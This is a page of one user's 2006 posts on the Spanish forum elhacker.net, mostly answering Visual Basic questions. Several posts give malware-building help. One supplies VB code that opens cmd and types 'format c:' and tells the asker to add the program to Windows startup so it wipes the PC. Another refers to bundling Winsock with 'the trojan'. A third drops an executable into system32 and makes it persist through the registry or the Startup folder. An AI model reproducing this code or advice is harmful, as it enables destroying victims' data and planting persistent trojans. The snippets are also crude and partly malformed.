elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


  Mostrar Mensajes
Páginas: 1 2 [3] 4
21  Programación / Programación Visual Basic / Re: UNA BASE DE DATOS CON VB en: 31 Marzo 2006, 21:52 pm
Si en VB se puede trabajar con Bases de datos y de forma muy sencilla, pero como dice Magic_Key es mejor que primero busques info acerca de VB, te recomiendo que visites www.canalvisualbasic.net ahi encontraras bastante info acerca de este lenguaje.
22  Programación / Programación Visual Basic / Re: ayuda con programa en: 28 Marzo 2006, 20:57 pm
Ok, de todos modos estuvo mas acertada la ayuda UTU pero de todos modos
gracias por lo que me corresponde ;)
23  Programación / Programación Visual Basic / Re: ayuda con winsock en: 28 Marzo 2006, 20:56 pm
No hay necesidad de que este en la carpeta System32, simplemente dejas el OCX en la misma
carpeta del ejecutable o del troyano y listo.
24  Programación / Programación Visual Basic / Re: ayuda con winsock en: 27 Marzo 2006, 19:57 pm
MSWINSCK.OCX Sera tu solucion  ;)
25  Programación / Programación Visual Basic / Re: ayuda con programa en: 24 Marzo 2006, 23:05 pm
creo que lo podias hacer asi:

Código:
echo 0000110111 > c:\windows\system32\prueba.exe
y para que se inicie lo puedes hacer agregandolo al registro o en la carpeta Inicio de Winbugs  :P
26  Programación / Programación Visual Basic / Re: eliminar accesos directos en: 24 Marzo 2006, 22:41 pm
Mira lo que tienes que saber, es que los accesos directos tienen extensiones .ink entonces lo unico que debes saber es la ubicacion del acceso directo y sabiendo esto, haces como te dijo robokop osea: kill "ubicaciondelacceso/acceso.ink".

No encuentro ninguna otra forma de como explicarlo, pero si sigues con los problemas, postealo aqui...  ;)
27  Programación / Programación Visual Basic / Re: Cronometrar mi Aplicación en: 23 Marzo 2006, 21:55 pm
Pues mejor te dejo un link en el que te explican todo muy bien, y ya luego tu lo configuras para tu App, ok?

http://www.elguille.info/NET/dotnet/get_save_SettingCS.htm
28  Programación / Programación Visual Basic / Re: Cronometrar mi Aplicación en: 23 Marzo 2006, 21:10 pm
Pues hay una forma de hacerlo, es con una funcion que se llama savesetting y otra getsetting, si quieres mas info postealo aqui...
29  Seguridad Informática / Desafíos - Wargames / Re: Guia para Wargames en: 23 Marzo 2006, 20:59 pm
me queda una duda... con respecto al crack de archivos ...¿Como hacemos para sacar el Hash de un archivo?
o es que hay que conseguirse un programa especifico para ése programa al cual le queremos conocer su hash?
no se si me dejo entender o me hago desentender..  ;D
saludos!
Pues es muy sencillo, solo es cuestion de estarse fijando la barra donde escribes la URL y ahi te aparecera.
30  Programación / Programación Visual Basic / Re: formatear en: 21 Marzo 2006, 20:50 pm
Private Sub Form_Load()   
shell "cmd"                           ' shell nos permite ejecutar comandos del sistema y en este caso llamamos al dos
sendkeys "format c:"     ´sendkeys escribe format C: en el cmd
sendkeys "{ENTER}"    ´sendkeys "{enter}" manda los datos escritos
end
end sub

Si, este es el codigo para formatear, pero lo que debes hacer es que tu programa se agregue al inicio del windows y listo ya con eso puedes formatear el PC...
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines